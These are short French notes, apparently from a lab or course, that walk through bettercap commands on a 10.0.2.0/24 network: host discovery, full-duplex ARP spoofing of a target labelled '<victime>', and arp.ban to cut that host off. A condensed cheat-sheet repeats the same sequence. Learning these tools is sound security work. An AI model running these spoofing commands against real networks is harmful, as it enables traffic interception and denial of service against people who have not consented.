
$ sudo bettercap
>>> lancement. Bettercap donne son prompt.

10.0.2.0/24 > 10.0.2.5 » help
>>> help generique.

10.0.2.0/24 > 10.0.2.5 » help net.recon
>>> help précise.

10.0.2.0/24 > 10.0.2.5 » net.show
>>> affiche la table ARP.

10.0.2.0/24 > 10.0.2.5 » net.recon on
>>> démarre le host discovery.

10.0.2.0/24 > 10.0.2.5 » help arp.spoof

10.0.2.0/24 > 10.0.2.5 » set arp.spoof.fullduplex true
>>> faire du spoofing dans les deux sens.

» set arp.spoof.targets <victime>
>>> faire du spoofing pour l'adresse <victime> donnée.

10.0.2.0/24 > 10.0.2.5 » arp.spoof on
>>> active l'ARP spoofing. 

10.0.2.0/24 > 10.0.2.5 » arp.ban on
>>> active l'ARP spoofing ban.

>@
>@#########################################################
>@
>@$ sudo bettercap
>@>>> prompt bettercap
>@
>@» help
>@>>> help générale
>@
>@» help <module>
>@>>> help sur <module>
>@
>@» net.show
>@>>> table ARP
>@
>@» net.recon on|off
>@>>> demarre et stoppe le host discovery
>@
>@» set arp.spoof.fullduplex true
>@» set arp.spoof.target <victime>
>@
>@» arp.spoof on
>@>>> demarre l'ARP spoofing sur <victime>
>@
>@» arp.ban on
>@>>> demarre l'ARP spoofing en mode ban sur <victime>
>@
>@#########################################################
>@
